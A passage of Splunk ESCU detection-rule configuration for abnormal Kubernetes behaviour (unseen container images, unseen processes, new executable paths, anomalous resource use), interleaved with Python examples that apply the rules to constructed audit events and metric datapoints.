with those seen in the 30 days prior to that hour, and alerts if a new container image is detected. When a container in a Kubernetes cluster is created using a previously unseen image, it raises potential security risks and unknown variables. Unfamiliar container images could contain vulnerabilities, malware, or misconfigurations that pose threats to the cluster's integrity and the applications it hosts.
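Added example, not part of the Splunk ESCU content: the two Kubernetes audit-log rules above (Pod Created in Default Namespace and Pod With Host Network Attachment) applied in Python to constructed audit.k8s.io/v1 events. The events, usernames, pod names and IP addresses are made up. The Splunk search matches the kubectl last-applied-configuration annotation, which only exists when a pod was applied with kubectl; the example keeps that check next to a check on requestObject.spec.hostNetwork, which also catches pods created by controllers or other API clients (and requires the audit policy to record request bodies, i.e. Request or RequestResponse level for pods).

```python
import json

SENSITIVE_NAMESPACES = {"default", "kube-system", "kube-public"}
LAST_APPLIED = "kubectl.kubernetes.io/last-applied-configuration"


def audit_event(verb, namespace, name, user, src_ip,
                host_network=False, via_kubectl_apply=False):
    """Constructed audit.k8s.io/v1 event for a pod request (RequestResponse level).

    Only `kubectl apply` stores the manifest in the last-applied annotation;
    pods created by controllers or other API clients carry no such annotation.
    """
    spec = {"hostNetwork": host_network,
            "containers": [{"name": "app", "image": "nginx:1.25"}]}
    annotations = {}
    if via_kubectl_apply:
        annotations[LAST_APPLIED] = json.dumps(
            {"kind": "Pod", "spec": spec}, separators=(",", ":"))
    return {
        "kind": "Event", "apiVersion": "audit.k8s.io/v1", "stage": "ResponseComplete",
        "verb": verb,
        "user": {"username": user, "groups": ["system:authenticated"]},
        "sourceIPs": [src_ip],
        "userAgent": "kubectl/v1.29.0" if via_kubectl_apply else "kube-controller-manager/v1.29.0",
        "objectRef": {"resource": "pods", "namespace": namespace, "name": name},
        "requestObject": {
            "kind": "Pod",
            "metadata": {"name": name, "namespace": namespace, "annotations": annotations},
            "spec": spec,
        },
        "responseStatus": {"code": 201 if verb == "create" else 200},
    }


def pod_created_in_sensitive_namespace(event):
    """Rule 1: verb=create, resource=pods, namespace in the sensitive set."""
    ref = event.get("objectRef", {})
    return (event.get("verb") == "create" and ref.get("resource") == "pods"
            and ref.get("namespace") in SENSITIVE_NAMESPACES)


def host_network_via_annotation(event):
    """What the rule's wildcard match on the last-applied annotation actually sees."""
    ann = event.get("requestObject", {}).get("metadata", {}).get("annotations") or {}
    return '"hostNetwork":true' in ann.get(LAST_APPLIED, "")


def host_network_via_spec(event):
    """Looks at the pod spec itself, independent of how the pod was submitted."""
    return event.get("requestObject", {}).get("spec", {}).get("hostNetwork") is True


def pod_with_host_network(event, check=host_network_via_spec):
    """Rule 2: verb=create OR verb=update on pods with hostNetwork set."""
    ref = event.get("objectRef", {})
    if event.get("verb") not in ("create", "update") or ref.get("resource") != "pods":
        return False
    return check(event)


def run_rules(events, host_network_check=host_network_via_spec):
    """One finding per event that trips a rule, carrying the fields the risk messages use."""
    findings = []
    for e in events:
        hits = []
        if pod_created_in_sensitive_namespace(e):
            hits.append("pod_created_in_default_namespace")
        if pod_with_host_network(e, host_network_check):
            hits.append("pod_with_host_network")
        if hits:
            findings.append({"user": e["user"]["username"], "src_ip": e["sourceIPs"][0],
                             "namespace": e["objectRef"]["namespace"],
                             "pod": e["objectRef"]["name"], "rules": hits})
    return findings


# Constructed sample log: a kubectl-applied hostNetwork pod in default, a DaemonSet
# pod in kube-system (no annotation), a normal app pod, an update that turns on
# hostNetwork, and a read that must not match.
SAMPLE_EVENTS = [
    audit_event("create", "default", "debug-shell", "alice", "10.0.0.5",
                host_network=True, via_kubectl_apply=True),
    audit_event("create", "kube-system", "node-agent-x7k2q",
                "system:serviceaccount:kube-system:daemon-set-controller", "10.0.0.1",
                host_network=True),
    audit_event("create", "payments", "api-6d4f9",
                "system:serviceaccount:kube-system:replicaset-controller", "10.0.0.1"),
    audit_event("update", "payments", "sniffer", "bob", "10.0.0.9", host_network=True),
    audit_event("get", "default", "debug-shell", "alice", "10.0.0.5",
                host_network=True, via_kubectl_apply=True),
]

if __name__ == "__main__":
    for finding in run_rules(SAMPLE_EVENTS):
        print(finding)
```

With the spec check, the DaemonSet pod and the updated pod are reported; with the annotation check only the kubectl-applied pod trips the hostNetwork rule. The DaemonSet pod is also the typical false positive for both rules: CNI and kube-proxy style add-ons legitimately run in kube-system with hostNetwork, so the filter macros are where those are excluded.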
The absence of prior knowledge about the image makes it difficult to assess its trustworthiness, track its lineage, or verify its compliance with security policies. The potential security impact of a container created using a compromised image is significant. Compromised containers can potentially introduce malware, backdoors, or other malicious code into the containerized application, leading to data breaches, service disruptions, and unauthorized access within the Kubernetes cluster. A compromised image can serve as a foothold for lateral movement and privilege escalation, potentially compromising other containers, pods, or nodes in the cluster. Additionally, it may enable the actor to exfiltrate sensitive data, manipulate configurations, or execute arbitrary code, posing risks to the confidentiality, availability, and integrity of applications and data hosted within the cluster. action.escu.mappings = {"cis20": ["CIS 13"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1204"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = The following analytic identifies containerised workloads that have been created using a previously unseen image. This detection leverages container metrics harvested using an OTEL collector and the Kubernetes cluster receiver, and is pulled from Splunk Observability cloud using the Splunk Infrastructure Monitoring Add-on. (https://splunkbase.splunk.com/app/5247). This detection uses the k8s.container.ready metric to compare the container image names seen in the last 1 hour with those seen in the 30 days prior to that hour, and alerts if a new container image is detected. When a container in a Kubernetes cluster is created using a previously unseen image, it raises potential security risks and unknown variables. Unfamiliar container images could contain vulnerabilities, malware, or misconfigurations that pose threats to the cluster's integrity and the applications it hosts.
The absence of prior knowledge about the image makes it difficult to assess its trustworthiness, track its lineage, or verify its compliance with security policies. The potential security impact of a container created using a compromised image is significant. Compromised containers can potentially introduce malware, backdoors, or other malicious code into the containerized application, leading to data breaches, service disruptions, and unauthorized access within the Kubernetes cluster. A compromised image can serve as a foothold for lateral movement and privilege escalation, potentially compromising other containers, pods, or nodes in the cluster. Additionally, it may enable the actor to exfiltrate sensitive data, manipulate configurations, or execute arbitrary code, posing risks to the confidentiality, availability, and integrity of applications and data hosted within the cluster. action.escu.how_to_implement = To implement this detection, follow these steps: \ * Deploy the OpenTelemetry Collector (OTEL) to your Kubernetes cluster.\ * Enable the hostmetrics/process receiver in the OTEL configuration.\ * Ensure that the process metrics, specifically process.cpu.utilization and process.memory.utilization, are enabled.\ * Install the Splunk Infrastructure Monitoring (SIM) add-on. (ref: https://splunkbase.splunk.com/app/5247)\ * Configure the SIM add-on with your Observability Cloud Organization ID and Access Token.\ * Set up the SIM modular input to ingest Process Metrics.
Name this input "sim_process_metrics_to_metrics_index".\ * In the SIM configuration, set the Organization ID to your Observability Cloud Organization ID.\ * Set the Signal Flow Program to the following: data('process.threads').publish(label='A'); data('process.cpu.utilization').publish(label='B'); data('process.cpu.time').publish(label='C'); data('process.disk.io').publish(label='D'); data('process.memory.usage').publish(label='E'); data('process.memory.virtual').publish(label='F'); data('process.memory.utilization').publish(label='G'); data('process.cpu.utilization').publish(label='H'); data('process.disk.operations').publish(label='I'); data('process.handles').publish(label='J'); data('process.threads').publish(label='K')\ * Set the Metric Resolution to 10000.\ * Leave all other settings at their default values.\ * Run the Search Baseline Of Kubernetes Container Network IO Ratio action.escu.known_false_positives = unknown action.escu.creation_date = 2023-12-18 action.escu.modification_date = 2023-12-18 action.escu.confidence = high action.escu.full_search_name = ESCU - Kubernetes Previously Unseen Container Image Name - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Kubernetes"] action.escu.analytic_story = ["Abnormal Kubernetes Behavior using Splunk Infrastructure Monitoring"] action.risk = 1 action.risk.param._risk_message = Kubernetes Previously Unseen Container Image Name on host $host$ action.risk.param._risk = [{"risk_object_field": "host", "risk_object_type": "other", "risk_score": 25}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Experimental - Kubernetes Previously Unseen Container Image Name - Rule action.correlationsearch.annotations = 
{"analytic_story": ["Abnormal Kubernetes Behavior using Splunk Infrastructure Monitoring"], "cis20": ["CIS 13"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1204"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | mstats count(k8s.container.ready) as k8s.container.ready_count where `kubernetes_metrics` AND earliest=-1h by host.name k8s.cluster.name k8s.node.name container.image.name | eval current="True" | append [mstats count(k8s.container.ready) as k8s.container.ready_count where `kubernetes_metrics` AND earliest=-30d latest=-1h by host.name k8s.cluster.name k8s.node.name container.image.name ] | stats count values(current) as current by host.name k8s.cluster.name k8s.node.name container.image.name | where count=1 AND current="True" | rename host.name as host | `kubernetes_previously_unseen_container_image_name_filter` [ESCU - Kubernetes Previously Unseen Process - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection is marked **EXPERIMENTAL** by the Splunk Threat Research Team. This means that the detection has been manually tested but we do not have the associated attack data to perform automated testing or cannot share this attack dataset due to its sensitive nature. If you have any questions feel free to email us at: research@splunk.com. This analytic detects newly seen processes within the Kubernetes scope on a master or worker node. This detection leverages process metrics harvested using an OTEL collector and hostmetrics receiver, and is pulled from Splunk Observability cloud using the Splunk Infrastructure Monitoring Add-on. (https://splunkbase.splunk.com/app/5247).
This detection compares the processes seen for each node over the previous 1 hour with those over the previous 30 days up until the previous 1 hour. The specific metric used by this detection is process.memory.utilization. Newly seen processes on a Kubernetes worker node are concerning as they may represent security risks and anomalies that could be related to unauthorized activity. New processes may be introduced in an attempt to compromise the node or gain control of the Kubernetes cluster. By detecting these processes, they can be investigated, and correlated with other anomalous activity for that host. Newly seen processes may be part of an attacker's strategy to compromise the node, gain unauthorized access, and subsequently extend their control to the entire Kubernetes cluster. These processes could facilitate activities such as data exfiltration, privilege escalation, denial-of-service attacks, or the introduction of malware and backdoors, putting sensitive data, applications, and the entire infrastructure at risk. The consequences may include data breaches, service disruptions, financial losses, and reputational damage, underscoring the need to identify anomalous processes and associate them with any concurrent risk activity. action.escu.mappings = {"cis20": ["CIS 13"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1204"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = This analytic detects newly seen processes within the Kubernetes scope on a master or worker node. This detection leverages process metrics harvested using an OTEL collector and hostmetrics receiver, and is pulled from Splunk Observability cloud using the Splunk Infrastructure Monitoring Add-on. (https://splunkbase.splunk.com/app/5247). This detection compares the processes seen for each node over the previous 1 hour with those over the previous 30 days up until the previous 1 hour. The specific metric used by this detection is process.memory.utilization.
Newly seen processes on a Kubernetes worker node are concerning as they may represent security risks and anomalies that could be related to unauthorized activity. New processes may be introduced in an attempt to compromise the node or gain control of the Kubernetes cluster. By detecting these processes, they can be investigated, and correlated with other anomalous activity for that host. Newly seen processes may be part of an attacker's strategy to compromise the node, gain unauthorized access, and subsequently extend their control to the entire Kubernetes cluster. These processes could facilitate activities such as data exfiltration, privilege escalation, denial-of-service attacks, or the introduction of malware and backdoors, putting sensitive data, applications, and the entire infrastructure at risk. The consequences may include data breaches, service disruptions, financial losses, and reputational damage, underscoring the need to identify anomalous processes and associate them with any concurrent risk activity. action.escu.how_to_implement = To implement this detection, follow these steps: \ * Deploy the OpenTelemetry Collector (OTEL) to your Kubernetes cluster.\ * Enable the hostmetrics/process receiver in the OTEL configuration.\ * Ensure that the process metrics, specifically process.cpu.utilization and process.memory.utilization, are enabled.\ * Install the Splunk Infrastructure Monitoring (SIM) add-on. (ref: https://splunkbase.splunk.com/app/5247)\ * Configure the SIM add-on with your Observability Cloud Organization ID and Access Token.\ * Set up the SIM modular input to ingest Process Metrics.
Name this input "sim_process_metrics_to_metrics_index".\ * In the SIM configuration, set the Organization ID to your Observability Cloud Organization ID.\ * Set the Signal Flow Program to the following: data('process.threads').publish(label='A'); data('process.cpu.utilization').publish(label='B'); data('process.cpu.time').publish(label='C'); data('process.disk.io').publish(label='D'); data('process.memory.usage').publish(label='E'); data('process.memory.virtual').publish(label='F'); data('process.memory.utilization').publish(label='G'); data('process.cpu.utilization').publish(label='H'); data('process.disk.operations').publish(label='I'); data('process.handles').publish(label='J'); data('process.threads').publish(label='K')\ * Set the Metric Resolution to 10000.\ * Leave all other settings at their default values.\ * Run the Search Baseline Of Kubernetes Container Network IO Ratio action.escu.known_false_positives = unknown action.escu.creation_date = 2023-12-18 action.escu.modification_date = 2023-12-18 action.escu.confidence = high action.escu.full_search_name = ESCU - Kubernetes Previously Unseen Process - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Kubernetes"] action.escu.analytic_story = ["Abnormal Kubernetes Behavior using Splunk Infrastructure Monitoring"] action.risk = 1 action.risk.param._risk_message = Kubernetes Previously Unseen Process on host $host$ action.risk.param._risk = [{"risk_object_field": "host", "risk_object_type": "other", "risk_score": 25}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Experimental - Kubernetes Previously Unseen Process - Rule action.correlationsearch.annotations = {"analytic_story": ["Abnormal Kubernetes Behavior 
using Splunk Infrastructure Monitoring"], "cis20": ["CIS 13"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1204"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | mstats count(process.memory.utilization) as process.memory.utilization_count where `kubernetes_metrics` AND earliest=-1h by host.name k8s.cluster.name k8s.node.name process.executable.name | eval current="True" | append [mstats count(process.memory.utilization) as process.memory.utilization_count where `kubernetes_metrics` AND earliest=-30d latest=-1h by host.name k8s.cluster.name k8s.node.name process.executable.name ] | stats count values(current) as current by host.name k8s.cluster.name k8s.node.name process.executable.name | where count=1 and current="True" | rename host.name as host | `kubernetes_previously_unseen_process_filter` [ESCU - Kubernetes Process Running From New Path - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection is marked **EXPERIMENTAL** by the Splunk Threat Research Team. This means that the detection has been manually tested but we do not have the associated attack data to perform automated testing or cannot share this attack dataset due to its sensitive nature. If you have any questions feel free to email us at: research@splunk.com. This analytic detects processes running within the same scope as Kubernetes that have been run from a newly seen path. This detection leverages process metrics harvested using an OTEL collector and hostmetrics receiver, and is pulled from Splunk Observability cloud using the Splunk Infrastructure Monitoring Add-on. (https://splunkbase.splunk.com/app/5247).
This detection compares the processes seen for each node over the previous 1 hour with those over the previous 30 days up until the previous 1 hour, and alerts if the path for that process was not seen over the previous 30 days. The specific metric used by this detection is process.memory.utilization. Processes running from a newly seen path can signify potential security risks and anomalies. A process executing from an unfamiliar file path may indicate unauthorized changes to the file system, a compromised node, or the introduction of malicious software. If the presence of a process running from a newly seen file path on a Kubernetes node indicates malicious activity, the security implications could be severe. It suggests that an attacker has potentially compromised the node, allowing them to execute unauthorized processes and potentially gain control over critical resources. This could lead to further exploitation, data exfiltration, privilege escalation, or the introduction of malware and backdoors within the Kubernetes cluster. action.escu.mappings = {"cis20": ["CIS 13"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1204"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = This analytic detects processes running within the same scope as Kubernetes that have been run from a newly seen path. This detection leverages process metrics harvested using an OTEL collector and hostmetrics receiver, and is pulled from Splunk Observability cloud using the Splunk Infrastructure Monitoring Add-on. (https://splunkbase.splunk.com/app/5247). This detection compares the processes seen for each node over the previous 1 hour with those over the previous 30 days up until the previous 1 hour, and alerts if the path for that process was not seen over the previous 30 days. The specific metric used by this detection is process.memory.utilization. Processes running from a newly seen path can signify potential security risks and anomalies.
A process executing from an unfamiliar file path may indicate unauthorized changes to the file system, a compromised node, or the introduction of malicious software. If the presence of a process running from a newly seen file path on a Kubernetes node indicates malicious activity, the security implications could be severe. It suggests that an attacker has potentially compromised the node, allowing them to execute unauthorized processes and potentially gain control over critical resources. This could lead to further exploitation, data exfiltration, privilege escalation, or the introduction of malware and backdoors within the Kubernetes cluster. action.escu.how_to_implement = To implement this detection, follow these steps: \ * Deploy the OpenTelemetry Collector (OTEL) to your Kubernetes cluster.\ * Enable the hostmetrics/process receiver in the OTEL configuration.\ * Ensure that the process metrics, specifically process.cpu.utilization and process.memory.utilization, are enabled.\ * Install the Splunk Infrastructure Monitoring (SIM) add-on. (ref: https://splunkbase.splunk.com/app/5247)\ * Configure the SIM add-on with your Observability Cloud Organization ID and Access Token.\ * Set up the SIM modular input to ingest Process Metrics.
Name this input "sim_process_metrics_to_metrics_index".\ * In the SIM configuration, set the Organization ID to your Observability Cloud Organization ID.\ * Set the Signal Flow Program to the following: data('process.threads').publish(label='A'); data('process.cpu.utilization').publish(label='B'); data('process.cpu.time').publish(label='C'); data('process.disk.io').publish(label='D'); data('process.memory.usage').publish(label='E'); data('process.memory.virtual').publish(label='F'); data('process.memory.utilization').publish(label='G'); data('process.cpu.utilization').publish(label='H'); data('process.disk.operations').publish(label='I'); data('process.handles').publish(label='J'); data('process.threads').publish(label='K')\ * Set the Metric Resolution to 10000.\ * Leave all other settings at their default values.\ * Run the Search Baseline Of Kubernetes Container Network IO Ratio action.escu.known_false_positives = unknown action.escu.creation_date = 2023-12-18 action.escu.modification_date = 2023-12-18 action.escu.confidence = high action.escu.full_search_name = ESCU - Kubernetes Process Running From New Path - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Kubernetes"] action.escu.analytic_story = ["Abnormal Kubernetes Behavior using Splunk Infrastructure Monitoring"] action.risk = 1 action.risk.param._risk_message = Kubernetes Process Running From New Path on host $host$ action.risk.param._risk = [{"risk_object_field": "host", "risk_object_type": "other", "risk_score": 25}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Experimental - Kubernetes Process Running From New Path - Rule action.correlationsearch.annotations = {"analytic_story": ["Abnormal Kubernetes 
Behavior using Splunk Infrastructure Monitoring"], "cis20": ["CIS 13"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1204"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | mstats count(process.memory.utilization) as process.memory.utilization_count where `kubernetes_metrics` AND earliest=-1h by host.name k8s.cluster.name k8s.node.name process.executable.path process.executable.name | eval current="True" | append [ mstats count(process.memory.utilization) as process.memory.utilization_count where `kubernetes_metrics` AND earliest=-30d latest=-1h by host.name k8s.cluster.name k8s.node.name process.executable.path process.executable.name ] | stats count values(current) as current by host.name k8s.cluster.name k8s.node.name process.executable.name process.executable.path | where count=1 and current="True" | rename host.name as host | `kubernetes_process_running_from_new_path_filter` [ESCU - Kubernetes Process with Anomalous Resource Utilisation - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection is marked **EXPERIMENTAL** by the Splunk Threat Research Team. This means that the detection has been manually tested but we do not have the associated attack data to perform automated testing or cannot share this attack dataset due to its sensitive nature. If you have any questions feel free to email us at: research@splunk.com. This analytic identifies high resource utilization anomalies in Kubernetes processes. It uses process metrics from an OTEL collector and hostmetrics receiver, fetched from Splunk Observability cloud via the Splunk Infrastructure Monitoring Add-on.
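Added example, not part of the Splunk content or the Splunk Infrastructure Monitoring add-on: the "previously unseen" comparison shared by the Previously Unseen Container Image Name, Previously Unseen Process and Process Running From New Path rules above, done in Python over constructed metric datapoints. The datapoints, the fixed search time, and the cluster, node, image and path names are all made up. The key deliberately contains the node, so a known image landing on a node that never ran it is reported, and for the path rule it contains the executable path but not the PID, so a restarted process is not reported. The example also reports how much of the 30-day baseline window actually has data, which the searches above do not: on a freshly deployed collector every image and process is "new" until the baseline fills.

```python
from datetime import datetime, timedelta, timezone

# Constructed "now": the time the scheduled search would run.
NOW = datetime(2024, 4, 17, 22, 0, tzinfo=timezone.utc)
CURRENT_WINDOW = timedelta(hours=1)    # earliest=-1h
BASELINE_WINDOW = timedelta(days=30)   # earliest=-30d latest=-1h


def previously_unseen(points, key_fields, now=NOW,
                      current_window=CURRENT_WINDOW, baseline_window=BASELINE_WINDOW):
    """Keys present in the current window but absent from the baseline window.

    points: dicts with a timezone-aware 'ts' plus the dimension fields.
    key_fields: which dimensions form the identity (same as the SPL `by` clause).
    Anything older than the baseline window is ignored, exactly as the search does.
    """
    current_start = now - current_window
    baseline_start = now - baseline_window
    current, baseline = set(), set()
    for p in points:
        key = tuple(p[f] for f in key_fields)
        ts = p["ts"]
        if current_start <= ts <= now:
            current.add(key)
        elif baseline_start <= ts < current_start:
            baseline.add(key)
    return sorted(current - baseline)


def baseline_coverage(points, now=NOW, baseline_window=BASELINE_WINDOW):
    """Fraction of the baseline window for which any datapoint exists (0.0 to 1.0)."""
    if not points:
        return 0.0
    oldest = min(p["ts"] for p in points)
    return min(1.0, (now - oldest) / baseline_window)


def _pt(age, **dims):
    """Constructed datapoint `age` before NOW."""
    return {"ts": NOW - age, **dims}


D, M = timedelta(days=1), timedelta(minutes=1)

# Constructed k8s.container.ready datapoints (cluster, node, image dimensions).
IMAGE_POINTS = [
    _pt(20 * D, cluster="prod", node="node-a", image="nginx:1.25"),
    _pt(30 * M, cluster="prod", node="node-a", image="nginx:1.25"),       # known
    _pt(15 * M, cluster="prod", node="node-a", image="unknown.example/agent:latest"),
    _pt(10 * M, cluster="prod", node="node-b", image="nginx:1.25"),       # known image, new node
    _pt(31 * D, cluster="prod", node="node-b", image="nginx:1.25"),       # outside the 30d baseline
]

# Constructed process.memory.utilization datapoints (cluster, node, exe, path).
PROCESS_POINTS = [
    _pt(10 * D, cluster="prod", node="node-a", exe="kubelet", path="/usr/bin/kubelet"),
    _pt(20 * M, cluster="prod", node="node-a", exe="kubelet", path="/usr/bin/kubelet"),
    _pt(5 * M, cluster="prod", node="node-a", exe="kubelet", path="/tmp/.cache/kubelet"),
]

if __name__ == "__main__":
    print("new images:", previously_unseen(IMAGE_POINTS, ("cluster", "node", "image")))
    print("new processes:", previously_unseen(PROCESS_POINTS, ("cluster", "node", "exe")))
    print("new paths:", previously_unseen(PROCESS_POINTS, ("cluster", "node", "exe", "path")))
    print("process baseline coverage:", round(baseline_coverage(PROCESS_POINTS), 2))
```

The kubelet copy in /tmp is invisible to the Previously Unseen Process rule (same executable name) and only surfaces under Process Running From New Path, which is why the two rules exist side by side. A coverage well below 1.0 means the alerts from that run are mostly baseline gaps, not new workloads.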
The detection uses a lookup table with average and standard deviation values for various process metrics to identify anomalies. High resource utilization can indicate security threats or operational issues, such as cryptojacking, unauthorized data exfiltration, or compromised containers. These anomalies can disrupt services, exhaust resources, increase costs, and allow attackers to evade detection or maintain access. action.escu.mappings = {"cis20": ["CIS 13"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1204"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = This analytic identifies high resource utilization anomalies in Kubernetes processes. It uses process metrics from an OTEL collector and hostmetrics receiver, fetched from Splunk Observability cloud via the Splunk Infrastructure Monitoring Add-on. The detection uses a lookup table with average and standard deviation values for various process metrics to identify anomalies. High resource utilization can indicate security threats or operational issues, such as cryptojacking, unauthorized data exfiltration, or compromised containers. These anomalies can disrupt services, exhaust resources, increase costs, and allow attackers to evade detection or maintain access. action.escu.how_to_implement = To implement this detection, follow these steps: \ * Deploy the OpenTelemetry Collector (OTEL) to your Kubernetes cluster.\ * Enable the hostmetrics/process receiver in the OTEL configuration.\ * Ensure that the process metrics, specifically process.cpu.utilization and process.memory.utilization, are enabled.\ * Install the Splunk Infrastructure Monitoring (SIM) add-on. (ref: https://splunkbase.splunk.com/app/5247)\ * Configure the SIM add-on with your Observability Cloud Organization ID and Access Token.\ * Set up the SIM modular input to ingest Process Metrics.
Name this input "sim_process_metrics_to_metrics_index".\ * In the SIM configuration, set the Organization ID to your Observability Cloud Organization ID.\ * Set the Signal Flow Program to the following: data('process.threads').publish(label='A'); data('process.cpu.utilization').publish(label='B'); data('process.cpu.time').publish(label='C'); data('process.disk.io').publish(label='D'); data('process.memory.usage').publish(label='E'); data('process.memory.virtual').publish(label='F'); data('process.memory.utilization').publish(label='G'); data('process.cpu.utilization').publish(label='H'); data('process.disk.operations').publish(label='I'); data('process.handles').publish(label='J'); data('process.threads').publish(label='K')\ * Set the Metric Resolution to 10000.\ * Leave all other settings at their default values.\ * Run the Search Baseline Of Kubernetes Container Network IO Ratio action.escu.known_false_positives = unknown action.escu.creation_date = 2023-12-18 action.escu.modification_date = 2023-12-18 action.escu.confidence = high action.escu.full_search_name = ESCU - Kubernetes Process with Anomalous Resource Utilisation - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Kubernetes"] action.escu.analytic_story = ["Abnormal Kubernetes Behavior using Splunk Infrastructure Monitoring"] action.risk = 1 action.risk.param._risk_message = Kubernetes Process with Anomalous Resource Utilisation on host $host$ action.risk.param._risk = [{"risk_object_field": "host", "risk_object_type": "other", "risk_score": 25}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Experimental - Kubernetes Process with Anomalous Resource Utilisation - Rule action.correlationsearch.annotations = 
{"analytic_story": ["Abnormal Kubernetes Behavior using Splunk Infrastructure Monitoring"], "cis20": ["CIS 13"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1204"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | mstats avg(process.*) as process.* where `kubernetes_metrics` by host.name k8s.cluster.name k8s.node.name process.executable.name span=10s | eval key = 'k8s.cluster.name' + ":" + 'host.name' + ":" + 'process.executable.name' | lookup k8s_process_resource_baseline key | fillnull | eval anomalies = "" | foreach stdev_* [ eval anomalies =if( '<>' > ('avg_<>' + 4 * 'stdev_<>'), anomalies + "<> higher than average by " + tostring(round(('<>' - 'avg_<>')/'stdev_<>' ,2)) + " Standard Deviations. <>=" + tostring('<>') + " avg_<>=" + tostring('avg_<>') + " 'stdev_<>'=" + tostring('stdev_<>') + ", " , anomalies) ] | eval anomalies = replace(anomalies, ",\s$", "") | where anomalies!="" | stats count values(anomalies) as anomalies by host.name k8s.cluster.name k8s.node.name process.executable.name | sort - count | where count > 5 | rename host.name as host | `kubernetes_process_with_anomalous_resource_utilisation_filter` [ESCU - Kubernetes Process with Resource Ratio Anomalies - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection is marked **EXPERIMENTAL** by the Splunk Threat Research Team. This means that the detection has been manually tested but we do not have the associated attack data to perform automated testing or cannot share this attack dataset due to its sensitive nature. If you have any questions feel free to email us at: research@splunk.com. 
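Added example, not Splunk code: the z-score check of the Process with Anomalous Resource Utilisation rule above in Python, with a constructed baseline in the shape of the k8s_process_resource_baseline lookup (key = cluster:host:executable, per-metric avg and stdev) and constructed 10-second samples. The baseline values, process names and sample values are made up. A bucket is anomalous when a metric exceeds avg + 4 * stdev, and a process is reported only when more than five buckets are anomalous, matching the rule's `where count > 5`. Processes with no baseline entry are skipped rather than compared against zero-filled averages; flagging those is the job of the previously-unseen rules.

```python
from collections import defaultdict
from statistics import mean

BUCKET_SECONDS = 10          # mstats span=10s
Z_THRESHOLD = 4.0            # '<>' > 'avg_<>' + 4 * 'stdev_<>'
MIN_ANOMALOUS_BUCKETS = 6    # where count > 5

# Constructed baseline lookup: key -> {metric: (avg, stdev)}.
BASELINE = {
    "prod:node-a:nginx": {
        "process.cpu.utilization": (0.05, 0.02),
        "process.memory.utilization": (1.2, 0.1),
    },
    "prod:node-a:python3": {
        "process.cpu.utilization": (0.1, 0.05),
        "process.memory.utilization": (2.0, 0.3),
    },
}


def make_key(cluster, host, exe):
    """Same key the rule builds: 'k8s.cluster.name' + ":" + 'host.name' + ":" + 'process.executable.name'."""
    return f"{cluster}:{host}:{exe}"


def bucket_averages(samples):
    """Average each metric per (key, 10s bucket), like mstats avg(process.*) span=10s.

    samples: iterable of (ts_seconds, cluster, host, exe, metric, value).
    """
    acc = defaultdict(lambda: defaultdict(list))
    for ts, cluster, host, exe, metric, value in samples:
        acc[(make_key(cluster, host, exe), ts // BUCKET_SECONDS)][metric].append(value)
    return {k: {m: mean(v) for m, v in metrics.items()} for k, metrics in acc.items()}


def score_bucket(key, metrics, baseline=BASELINE):
    """Anomaly strings for one bucket, in the wording the rule's anomalies field uses."""
    hits = []
    profile = baseline.get(key)
    if profile is None:          # no baseline for this process: skip, do not compare to 0
        return hits
    for metric, value in metrics.items():
        if metric not in profile:
            continue
        avg, stdev = profile[metric]
        if stdev <= 0:           # degenerate baseline; avoids division by zero
            continue
        if value > avg + Z_THRESHOLD * stdev:
            z = round((value - avg) / stdev, 2)
            hits.append(f"{metric} higher than average by {z} Standard Deviations. "
                        f"{metric}={value} avg_{metric}={avg} stdev_{metric}={stdev}")
    return hits


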